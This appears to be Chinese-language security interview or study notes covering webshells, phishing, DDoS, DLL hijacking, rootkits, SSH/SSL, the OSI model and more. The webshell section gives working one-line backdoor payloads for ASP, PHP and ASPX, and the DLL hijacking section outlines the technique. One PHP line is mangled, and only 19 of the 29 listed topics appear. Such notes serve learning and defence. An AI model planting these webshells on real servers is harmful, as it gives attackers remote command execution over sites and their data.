主要講解內容

1.什麼是WebShell?
2.什麼是網路釣魚？
3.你獲取網路安全知識途徑有哪些？
4.什麼是CC攻擊？
5.Web伺服器被入侵後，怎樣進行排查？
6.dll檔案是什麼意思，有什麼用？DLL劫持原理
7.0day漏洞
8.Rootkit是什麼意思
9.蜜罐
10.ssh
11.DDOS
12.震網病毒：
13.一句話木馬
14.Https的作用
15.手工查詢後門木馬的小技巧
16.描述OSI（開放系統互聯基本參考模型）七層結構
17.TCP和UDP的區別
18.脫殼
19.“人肉搜尋”
20.SYN Flood的基本原理
21.什麼是手機”越獄“
22.主機被入侵，你會如何處理這件事自查解決方案：
23. NAT（網路地址轉換）協議
24.內網穿透
25.虛擬專用網路
26.二層交換機
27.路由技術
28.三層交換機
29.IPv6地址表示
 

1.什麼是WebShell?

WebShell就是以asp、php、jsp或者cgi等網頁檔案形式存在的─種命令執行環境，也可以將其稱做為─種網頁後門。黑客在入侵了─個網站後，通常會將這些asp或php後門檔案與網站伺服器WEB目錄下正常的網頁檔案混在─起，然後就可以使用瀏覽器來訪問這些asp或者php後門，得到─個命令執行環境，以達到控制網站伺服器的目的（可以上傳下載檔案，檢視資料庫，執行任意程式命令等）。國內常用的WebShell有海陽ASP木馬，Phpspy，c99shell等。

靜態網頁：最常用的格式檔案就是html格式檔案，大部分網頁的格式都是html格式，html格式又包含有.htm、

dhtml.xhtml.shtm.shtml。這些都是指靜態頁面，裡面不含有動態程式。

動態網頁：頁面級包括有ASP（基於JavaScript 或VbScript或C#）、JSP、PHP、ASPX、jspx、cgi。這些裡面是包含伺服器端執行的程式碼，也就是伺服器在將這些網頁發給客戶端之前，會先執行裡面的動態程式語言，並把執行後生成的html傳送到客戶端來的，所以我們在客戶端看到的原始碼也是html格式的（因為動態的程式碼直接在伺服器上執行，而這些伺服器程式碼是前臺是不會顯示出來。

2.什麼是網路釣魚？

網路釣魚是通過大量傳送聲稱來自於銀行或其他知名機構的欺騙性垃圾郵件,意圖引誘收信人給出敏感資訊（如使用者名稱、口令、帳號

ID 、 ATMPIN 碼或信用卡詳細資訊）的一種攻擊方式。

最典型的網路釣魚攻擊將收信人引誘到一個通過精心設計與目標組織的網站非常相似的釣魚網站上，並獲取收信人在此網站上輸入的個人敏感資訊，通常這個攻擊過程不會讓受害者警覺。

它常常導引使用者到URL與介面外觀與真正網站幾無二致的假冒網站輸入個人資料。就算使用強式加密的SSL伺服器認證，要偵測網站是否仿冒實際上仍很困難。網釣是一種利用社會工程技術來愚弄使用者的例項。它憑恃的是現行網路安全技術的低親和度。

3.你獲取網路安全知識途徑有哪些？

• 網站，看雪，安全焦點，國內的烏雲，FreeBuf
• 視訊學習：i春秋，51cto，慕課網，實驗樓，實驗吧，網易雲課堂等等
• 微信公眾號、知乎等，企業src等
• 書籍，《白帽子講web安全》《Web應用安全權威指南》等
• 然後就是請教牛人
• 最後是公司內技術分享。

4.什麼是CC攻擊？

這個也是知道一些，知道他是DDos的變種，正常請求偽造，伺服器資源耗盡，最終還是看看百科答案吧：CC攻擊是DDOS（分散式拒絕服務）的一種，相比其它的DDOS攻擊CC似乎更有技術含量一些。這種攻擊你見不到真實源IP，見不到特別大的異常流量，但造成伺服器無法進行正常連線。CC攻擊的原理就是攻擊者控制某些主機不停地發大量資料包給對方伺服器造成伺服器資源耗盡，一直到宕機崩潰。CC主要是用來攻擊頁面的，每個人都有這樣的體驗：當一個網頁訪問的人數特別多的時候，開啟網頁就慢了，CC就是模擬多個使用者（多少執行緒就是多少使用者）不停地進行訪問那些需要大量資料操作（就是需要大量CPU時間）的頁面，造成伺服器資源的浪費，CPU長時間處於100%，永遠都有處理不完的連線直至就網路擁塞，正常的訪問被中止。

5.Web伺服器被入侵後，怎樣進行排查？

最簡單就是

• 檢視下web 伺服器日誌
• 看看有沒有異常埠開放
• 使用安全狗等伺服器安全軟體清掃

6.dll檔案是什麼意思，有什麼用？

DLL（Dynamic Link Library）檔案，即動態連結庫，也有人稱作應用程式拓展。

Windows應用程式中，實行了模組化設計，也就是說並不是每個應用程式都編寫完所有的功能程式碼，而是在執行過程中呼叫相應功能的DLL，不需執行的功能就不呼叫，所以大大加快了程式的載入速度和效率，其他應用程式也可以呼叫相關的DLL，這樣也有利於促進程式碼重用以及記憶體使用效率，減少了資源佔用，而且程式更新時也只要更新相關的DLL就可以了。

要注意的是，有些病毒也會偽裝成DLL檔案，並替換系統的DLL檔案，需要我們防範。

DLL劫持原理

由於輸入表中只包含DLL名而沒有它的路徑名，因此載入程式必須在磁碟上搜索DLL檔案。首先會嘗試從當前程式所在的目錄載入DLL，如果沒找到，則在Windows系統目錄中查詢，最後是在環境變數中列出的各個目錄下查詢。利用這個特點，先偽造一個系統同名的DLL，提供同樣的輸出表，每個輸出函式轉向真正的系統DLL。程式呼叫系統DLL時會先呼叫當前目錄下偽造的DLL，完成相關功能後，再跳到系統DLL同名函式裡執行。這個過程用個形象的詞來描述就是系統DLL被劫持（hijack）了。

偽造的dll製作好後，放到程式當前目錄下，這樣當原程式呼叫原函式時就呼叫了偽造的dll的同名函式，進入劫持DLL的程式碼，處理完畢後，再呼叫原DLL此函式。

如何防止DLL劫持
DLL劫持利用系統未知DLL的搜尋路徑方式，使得程式載入當前目錄下的系統同名DLL。所以可以告訴系統DLL的位置，改變載入系統DLL的順序不是當前目錄，而是直接到系統目錄下查詢。

7.0day漏洞

是已經發現但是官方還沒釋出補丁的漏洞。

資訊保安意義上的0Day是指在安全補丁釋出前而被瞭解和掌握的漏洞資訊。

8.Rootkit是什麼意思

Rootkit是一種特殊型別的 malware（惡意軟體）。Rootkit 之所以特殊是因為您不知道它們在做什麼事情。Rootkit基本上是無法檢測到的，而且幾乎不可能刪除它們。雖然檢測工具在不斷增多，但是惡意軟體的開發者也在不斷尋找新的途徑來掩蓋他們的蹤跡。

Rootkit的目的在於隱藏自己以及其他軟體不被發現。它可以通過阻止使用者識別和刪除攻擊者的軟體來達到這個目的。Rootkit 幾乎可以隱藏任何軟體，包括檔案伺服器、鍵盤記錄器、Botnet 和Remailer。許多Rootkit 甚至可以隱藏大型的檔案集合並允許攻擊者在您的計算機上儲存許多檔案，而您無法看到這些檔案。

Rootkit本身不會像病毒或蠕蟲那樣影響計算機的執行。攻擊者可以找出目標系統上的現有漏洞。漏洞可能包括：開放的網路埠、未打補丁的系統或者具有脆弱的管理員密碼的系統。在獲得存在漏洞的系統的訪問許可權之後，攻擊者便可手動安裝一個 Rootkit。這種型別的偷偷摸摸的攻擊通常不會觸發自動執行的網路安全控制功能，例如入侵檢測系統。

找出 Rootkit 十分困難。有一些軟體包可以檢測 Rootkit。這些軟體包可劃分為以下兩類：基於簽名的檢查程式和基於行為的檢查程式。基於簽名（特徵碼）的檢查程式，例如大多數病毒掃描程式，會檢查二進位制檔案是否為已知的 Rootkit。基於行為的檢查程式試圖通過查詢一些代表 Rootkit 主要行為的隱藏元素來找出 Rootkit。一個流行的基於行為的 Rootkit 檢查程式是 Rootkit Revealer.

在發現系統中存在 Rootkit 之後，能夠採取的補救措施也較為有限。由於Rootkit 可以將自身隱藏起來，所以您可能無法知道它們已經在系統中存在了多長的時間。而且您也不知道 Rootkit 已經對哪些資訊造成了損害。對於找出的 Rootkit，最好的應對方法便是擦除並重新安裝系統。雖然這種手段很嚴厲，但是這是得到證明的唯一可以徹底刪除 Rootkit 的方法。

防止 Rootkit 進入您的系統是能夠使用的最佳辦法。為了實現這個目的，可以使用與防範所有攻擊計算機的惡意軟體一樣的深入防衛策略。深度防衛的要素包括：病毒掃描程式、定期更新軟體、在主機和網路上安裝防火牆，以及強密碼策略

9.蜜罐

蜜罐好比是情報收集系統。蜜罐好像是故意讓人攻擊的目標，引誘黑客前來攻擊。所以攻擊者入侵後，你就可以知道他是如何得逞的，隨時瞭解針對伺服器發動的最新的攻擊和漏洞。還可以通過竊聽黑客之間的聯絡，收集黑客所用的種種工具，並且掌握他們的社交網路。

10.ssh

SSH 為 Secure Shell 的縮寫，由 IETF 的網路小組（Network Working Group）所制定；SSH 為建立在應用層基礎上的安全協議。SSH 是目前較可靠，專為遠端登入會話和其他網路服務提供安全性的協議。利用 SSH 協議可以有效防止遠端管理過程中的資訊洩露問題。SSH最初是UNIX系統上的一個程式，後來又迅速擴充套件到其他操作平臺。SSH在正確使用時可彌補網路中的漏洞。SSH客戶端適用於多種平臺。幾乎所有UNIX平臺—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix，以及其他平臺，都可執行SSH。

傳統的網路服務程式，如：ftp、pop和telnet在本質上都是不安全的，因為它們在網路上用明文傳送口令和資料，別有用心的人非常容易就可以截獲這些口令和資料。而且，這些服務程式的安全驗證方式也是有其弱點的，就是很容易受到“中間人”（man-in-the-middle）這種方式的攻擊。所謂“中間人”的攻擊方式，就是“中間人”冒充真正的伺服器接收你傳給伺服器的資料，然後再冒充你把資料傳給真正的伺服器。伺服器和你之間的資料傳送被“中間人”一轉手做了手腳之後，就會出現很嚴重的問題。通過使用SSH，你可以把所有傳輸的資料進行加密，這樣"中間人"這種攻擊方式就不可能實現了，而且也能夠防止DNS欺騙和IP欺騙。使用SSH，還有一個額外的好處就是傳輸的資料是經過壓縮的，所以可以加快傳輸的速度。SSH有很多功能，它既可以代替Telnet，又可以為FTP、PoP、甚至為PPP提供一個安全的"通道"。

英文全稱是Secure Shell。通過使用SSH，你可以把所有傳輸的資料進行加密，這樣"中間人"這種攻擊方式就不可能實現了，而且也能夠防止DNS和IP欺騙。還有一個額外的好處就是傳輸的資料是經過壓縮的，所以可以加快傳輸的速度。 SSH有很多功能，它既可以代替telnet，又可以為ftp、pop、甚至ppp提供一個安全的"通道"。

SSH是由客戶端和服務端的軟體組成的，有兩個不相容的版本分別是：1.x和2.x。用SSH 2.x的客戶程式是不能連線到SSH 1.x的服務程式上去的。OpenSSH 2.x同時支援SSH 1.x和2.x。SSH的安全驗證是如何工作的從客戶端來看，SSH提供兩種級別的安全驗證。第一種級別（基於口令的安全驗證）只要你知道自己帳號和口令，就可以登入到遠端主機。所有傳輸的資料都會被加密，但是不能保證你正在連線的伺服器就是你想連線的伺服器。可能會有別的伺服器在冒充真正的伺服器，也就是受到“中間人”這種方式的攻擊。第二種級別（基於密匙的安全驗證）需要依靠密匙，也就是你必須為自己建立一對密匙，並把公用密匙放在需要訪問的伺服器上。如果你要連線到SSH伺服器上，客戶端軟體就會向伺服器發出請求，請求用你的密匙進行安全驗證。伺服器收到請求之後，先在你在該伺服器的家目錄下尋找你的公用密匙，然後把它和你傳送過來的公用密匙進行比較。如果兩個密匙一致，伺服器就用公用密匙加密“質詢”（challenge）並把它傳送給客戶端軟體。客戶端軟體收到“質詢”之後就可以用你的私人密匙解密再把它傳送給伺服器。用這種方式，你必須知道自己密匙的口令。但是，與第一種級別相比，第二種級別不需要在網路上傳送口令。第二種級別不僅加密所有傳送的資料，而且“中間人”這種攻擊方式也是不可能的（因為他沒有你的私人密匙）。但是整個登入的過程可能需要10秒。

SSL(SecureSockets Layer (SSL) and Transport Layer Security (TLS))被設計為加強Web安全傳輸(HTTP/HTTPS/)的協議(事實上還有SMTP/NNTP等),SSH(Secure Shell)更多的則被設計為加強Telnet/FTP安全的傳輸協議,預設地,它使用22埠.

以SSL為例,基本上SSL在傳輸過程中所處的位置如下:

－－－－－－－－－

|HTTP |

－－－－－－－－－

| SSL|

－－－－－－－－－

| TCP|

－－－－－－－－－

| IP|

－－－－－－－－－

如果利用SSL協議來訪問網頁，其步驟如下：

使用者：在瀏覽器的位址列裡輸入https://www.sslserver.com

HTTP層：將使用者需求翻譯成HTTP請求，如

GET/index.htm HTTP/1.1

Hosthttp://www.sslserver.com

SSL層: 藉助下層協議的的通道安全的協商出一份加密金鑰，並用此金鑰來加密HTTP請求。

TCP層：與web server的443埠建立連線，傳遞SSL處理後的資料。

接收端與此過程相反。

SSL在TCP之上建立了一個加密通道，通過這一層的資料經過了加密，因此達到保密的效果。

SSL協議分為兩部分：Handshake Protocol和Record Protocol,。其中Handshake Protocol用來協商金鑰，協議的大部分內容就是通訊雙方如何利用它來安全的協商出一份金鑰。 Record Protocol則定義了傳輸的格式。

11.DDOS

http://baike.baidu.com/link?url=hOeNhuaIj6tF9NY1wr2wbe9pIe52PaCJ5KXTisdfPUK4j8beTktmVsRaH5hRjkcpq6FPouzRl2hbsbpEDO5HRAUYi_D1Tsnu_q7in59xRasqHbmi1oYhEyVDVVn9ZcIcqRsZi5axo_HgkXBPioJx_#10

分散式拒絕服務(DDoS:Distributed Denial ofService)攻擊指藉助於客戶/伺服器技術，將多個計算機聯合起來作為攻擊平臺，對一個或多個目標發動DDoS攻擊，從而成倍地提高拒絕服務攻擊的威力。通常，攻擊者使用一個偷竊帳號將DDoS主控程式安裝在一個計算機上，在一個設定的時間主控程式將與大量代理程式通訊，代理程式已經被安裝在網路上的許多計算機上。代理程式收到指令時就發動攻擊。利用客戶/伺服器技術，主控程式能在幾秒鐘內啟用成百上千次代理程式的執行。

12.震網病毒：

指一種蠕蟲病毒，是第一個專門定向攻擊真實世界中基礎（能源）設施的“蠕蟲”病毒，比如核電站，水壩，國家電網。只要電腦操作員將被病毒感染的U盤插入USB介面，這種病毒就會在神不知鬼不覺的情況下(不會有任何其他操作要求或者提示出現)取得一些工業用電腦系統的控制權。

與傳統的電腦病毒相比，“震網”病毒不會通過竊取個人隱私資訊牟利。無需藉助網路連線進行傳播。這種病毒可以破壞世界各國的化工、發電和電力傳輸企業所使用的核心生產控制電腦軟體，並且代替其對工廠其他電腦“發號施令”。極具毒性和破壞力。“震網”程式碼非常精密，主要有兩個功能，一是使伊朗的離心機執行失控，二是掩蓋發生故障的情況，“謊報軍情”，以“正常運轉”記錄回傳給管理部門，造成決策的誤判。

13.一句話木馬

asp一句話木馬：

<%execute(request("value"))%>

php一句話木馬：

<[email protected]($_POST[value]);?>   

變形：<?php$x=$_GET[‘z’];@eval(“$x;”);?>

aspx一句話木馬：

<%@ PageLanguage="Jscript"%>

<%eval(Request.Item["value"])%>

14.Https的作用

內容加密建立一個資訊保安通道，來保證資料傳輸的安全；

身份認證確認網站的真實性

資料完整性防止內容被第三方冒充或者篡改

HTTPS和HTTP的區別

https協議需要到CA申請證書。

http是超文字傳輸協議，資訊是明文傳輸；https則是具有安全性的ssl加密傳輸協議。

http和https使用的是完全不同的連線方式，用的埠也不一樣，前者是80，後者是443。

http的連線很簡單，是無狀態的；HTTPS協議是由SSL+HTTP協議構建的可進行加密傳輸、身份認證的網路協議，比http協議安全。

15.手工查詢後門木馬的小技巧

1、首先最需要注意的地方是系統的啟動項，可以在“執行”-輸入“msconfig命令”在開啟的系統配置實用程式裡的啟動列表檢視，並且服務也要注意一下，如果對電腦不是太熟悉的童鞋建議使用360安全衛士的開機加速功能，來檢視有無異常的可以啟動項和服務項，因為在後門木馬中99%都會註冊自己為系統服務，達到開機自啟動的目的，如果發現可疑項直接開啟相應的路徑，找到程式檔案，直接刪除並且禁止自啟動；

2、檢視系統關鍵目錄system32和系統安裝目錄Windows下的檔案，xp系統下兩者預設路徑分別是C:\WINDOWS\system32和C:\WINDOWS\。然後最新修改的檔案中有沒有可疑的可執行檔案或dll檔案，這兩個地方都是木馬最喜歡的藏身的地方了（小提示：一定要設定顯示所有的檔案的資料夾哦）。

3、觀察網路連線是否存在異常，還有“執行”-“cmd”-“netstat -an”檢視有沒有可疑或非正常程式的網路連線，如果對電腦不是很熟悉建議大家使用360的流量監控功能更加直觀和方便，尤其注意一下遠端連線的埠，如果有類似於8000等埠就要注意了，8000是灰鴿子的預設埠，記得有一次自己就在後門木馬測試中在網路連線中發現8000埠，當然意思不是說只要沒有8000埠的網路連線就一定安全，因為8000埠只是灰鴿子上線的預設埠，並且埠是可以更改的。

通過以上方法，可以查詢到電腦的一些可疑檔案，如果確認無疑，就可以手工進行刪除了。當然還可以藉助防毒軟體的力量。如果你真的中了木馬後門，不用慌。最好最徹底的方法是重灌系統後，在安全模式下，利用最新病毒庫的殺軟進行查殺。

16.描述OSI（開放系統互聯基本參考模型）七層結構

分層的好處是利用層次結構可以把開放系統的資訊交換問題分解到一系列容易控制的軟硬體模組－層中，而各層可以根據需要獨立進行修改或擴充功能，同時，有利於個不同製造廠家的裝置互連，也有利於大家學習、理解資料通訊網路。

OSI參考模型中不同層完成不同的功能，各層相互配合通過標準的介面進行通訊。

第7層應用層：OSI中的最高層。為特定型別的網路應用提供了訪問OSI環境的手段。應用層確定程序之間通訊的性質，以滿足使用者的需要。應用層不僅要提供應用程序所需要的資訊交換和遠端操作，而且還要作為應用程序的使用者代理，來完成一些為進行資訊交換所必需的功能。它包括：檔案傳送訪問和管理FTAM、虛擬終端VT、事務處理TP、遠端資料庫訪問RDA、製造報文規範MMS、目錄服務DS等協議；應用層能與應用程式介面溝通，以達到展示給使用者的目的。在此常見的協議有:HTTP，HTTPS，FTP，TELNET，SSH，SMTP，POP3等。

第6層表示層：主要用於處理兩個通訊系統中交換資訊的表示方式。為上層使用者解決使用者資訊的語法問題。它包括資料格式交換、資料加密與解密、資料壓縮與終端型別的轉換。

第5層會話層：在兩個節點之間建立端連線。為端系統的應用程式之間提供了對話控制機制。此服務包括建立連線是以全雙工還是以半雙工的方式進行設定，儘管可以在層4中處理雙工方式；會話層管理登入和登出過程。它具體管理兩個使用者和程序之間的對話。如果在某一時刻只允許一個使用者執行一項特定的操作，會話層協議就會管理這些操作，如阻止兩個使用者同時更新資料庫中的同一組資料。

第4層傳輸層：—常規資料遞送－面向連線或無連線。為會話層使用者提供一個端到端的可靠、透明和優化的資料傳輸服務機制。包括全雙工或半雙工、流控制和錯誤恢復服務；傳輸層把訊息分成若干個分組，並在接收端對它們進行重組。不同的分組可以通過不同的連線傳送到主機。這樣既能獲得較高的頻寬，又不影響會話層。在建立連線時傳輸層可以請求服務質量，該服務質量指定可接受的誤位元速率、延遲量、安全性等引數，還可以實現基於端到端的流量控制功能。

第3層網路層：本層通過定址來建立兩個節點之間的連線，為源端的運輸層送來的分組，選擇合適的路由和交換節點，正確無誤地按照地址傳送給目的端的運輸層。它包括通過互連網路來路由和中繼資料；除了選擇路由之外，網路層還負責建立和維護連線，控制網路上的擁塞以及在必要的時候生成計費資訊。

第2層資料鏈路層：在此層將資料分幀，並處理流控制。遮蔽物理層，為網路層提供一個數據鏈路的連線，在一條有可能出差錯的物理連線上，進行幾乎無差錯的資料傳輸（差錯控制）。本層指定拓撲結構並提供硬體定址。常用裝置有網絡卡、網橋、交換機；

第1層物理層：處於OSI參考模型的最底層。物理層的主要功能是利用物理傳輸介質為資料鏈路層提供物理連線，以便透明的傳送位元流。常用裝置有（各種物理裝置）集線器、中繼器、調變解調器、網線、雙絞線、同軸電纜。

資料傳送時，從第七層傳到第一層，接收資料則相反。

上三層總稱應用層，用來控制軟體方面。下四層總稱資料流層，用來管理硬體。除了物理層之外其他層都是用軟體實現的。

資料在發至資料流層的時候將被拆分。

在傳輸層的資料叫段，網路層叫包，資料鏈路層叫幀，物理層叫位元流，這樣的叫法叫PDU（協議資料單元）[2]

各層功能

 (1)物理層(Physical Layer)

物理層是OSI參考模型的最低層，它利用傳輸介質為資料鏈路層提供物理連線。它主要關心的是通過物理鏈路從一個節點向另一個節點傳送位元流，物理鏈路可能是銅線、衛星、微波或其他的通訊媒介。它關心的問題有：多少伏電壓代表1？多少伏電壓代表0？時鐘速率是多少？採用全雙工還是半雙工傳輸？總的來說物理層關心的是鏈路的機械、電氣、功能和規程特性。

(2)資料鏈路層(Data Link Layer)

資料鏈路層是為網路層提供服務的，解決兩個相鄰結點之間的通訊問題，傳送的協議資料單元稱為資料幀。

資料幀中包含實體地址（又稱MAC地址）、控制碼、資料及校驗碼等資訊。該層的主要作用是通過校驗、確認和反饋重發等手段，將不可靠的物理鏈路轉換成對網路層來說無差錯的資料鏈路。

此外，資料鏈路層還要協調收發雙方的資料傳輸速率，即進行流量控制，以防止接收方因來不及處理髮送方來的高速資料而導致緩衝器溢位及線路阻塞。

(3)網路層(Network Layer)

網路層是為傳輸層提供服務的，傳送的協議資料單元稱為資料包或分組。該層的主要作用是解決如何使資料包通過各結點傳送的問題，即通過路徑選擇演算法（路由）將資料包送到目的地。另外，為避免通訊子網中出現過多的資料包而造成網路阻塞，需要對流入的資料包數量進行控制（擁塞控制）。當資料包要跨越多個通訊子網才能到達目的地時，還要解決網際互連的問題。

(4)傳輸層(Transport Layer)

傳輸層的作用是為上層協議提供端到端的可靠和透明的資料傳輸服務，包括處理差錯控制和流量控制等問題。該層向高層遮蔽了下層資料通訊的細節，使高層使用者看到的只是在兩個傳輸實體間的一條主機到主機的、可由使用者控制和設定的、可靠的資料通路。

傳輸層傳送的協議資料單元稱為段或報文。

(5)會話層(Session Layer)

會話層主要功能是管理和協調不同主機上各種程序之間的通訊（對話），即負責建立、管理和終止應用程式之間的會話。會話層得名的原因是它很類似於兩個實體間的會話概念。例如，一個互動的使用者會話以登入到計算機開始，以登出結束。

(6)表示層(Presentation Layer)

表示層處理流經結點的資料編碼的表示方式問題，以保證一個系統應用層發出的資訊可被另一系統的應用層讀出。如果必要，該層可提供一種標準表示形式，用於將計算機內部的多種資料表示格式轉換成網路通訊中採用的標準表示形式。資料壓縮和加密也是表示層可提供的轉換功能之一。

(7)應用層(Application Layer)

應用層是OSI參考模型的最高層，是使用者與網路的介面。該層通過應用程式來完成網路使用者的應用需求，如檔案傳輸、收發電子郵件等。

17.TCP和UDP的區別

TCP協議和UDP協議特性區別總結：

1.TCP協議在傳送資料段的時候要給段標號；UDP協議不

2.TCP協議可靠；UDP協議不可靠

3.TCP協議是面向連線；UDP協議採用無連線

4.TCP協議負載較高，採用虛電路；UDP採用無連線

5.TCP協議的傳送方要確認接收方是否收到資料段（3次握手協議）

6.TCP協議採用視窗技術和流控制

當資料傳輸的效能必須讓位於資料傳輸的完整性、可控制性和可靠性時，TCP協議是當然的選擇。當強調傳輸效能而不是傳輸的完整性時，如：音訊和多媒體應用，UDP是最好的選擇。在資料傳輸時間很短，以至於此前的連線過程成為整個流量主體的情況下，UDP也是一個好的選擇，如：DNS交換。把SNMP建立在UDP上的部分原因是設計者認為當發生網路阻塞時，UDP較低的開銷使其有更好的機會去傳送管理資料。TCP豐富的功能有時會導致不可預料的效能低下，但是我們相信在不遠的將來，TCP可靠的點對點連線將會用於絕大多數的網路應用。

18.脫殼

而從技術的角度出發，殼是一段執行於原始程式前的程式碼。原始程式的程式碼在加殼的過程中可能被壓縮、加密……。當加殼後的檔案執行時，殼－這段程式碼先於原始程式執行，他把壓縮、加密後的程式碼還原成原始程式程式碼，然後再把執行權交還給原始程式碼。軟體的殼分為加密殼、壓縮殼、偽裝殼、多層殼等類，目的都是為了隱藏程式真正的OEP（入口點，防止被破解）。

加殼”指的是對編譯好的EXE、DLL等檔案採用加殼來進行保護；“脫殼”指的就是將檔案外邊的殼去除，恢復檔案沒有加殼前的狀態。殼出於程式作者想對程式資源壓縮、註冊保護的目的，把殼分為壓縮殼、密碼殼、加密殼三種。顧名思義，壓縮殼只是為了減小程式體積對資源進行壓縮，常見的壓縮殼包括FSG、ASPack、UPX、北斗等；加密殼也就是常說的保護殼、猛殼，它對程式輸入表等內容進行加密保護，具有良好的保護效果，常見的加密殼包括ASPROTECT、ACPROTECT、PELock、幻影等；密碼殼平時使用得不多，加密殼的程式只有在正確輸入密碼後才能執行

19.“人肉搜尋”

是一種類比的稱呼，主要是用來區別傳統搜尋引擎。它主要是指通過集中許多網民的力量去搜索資訊和資源的一種方式，它包括利用網際網路的機器搜尋引擎（如百度等）及利用各網民在日常生活中所能掌握的資訊來進行收集資訊的一種方式

相關推薦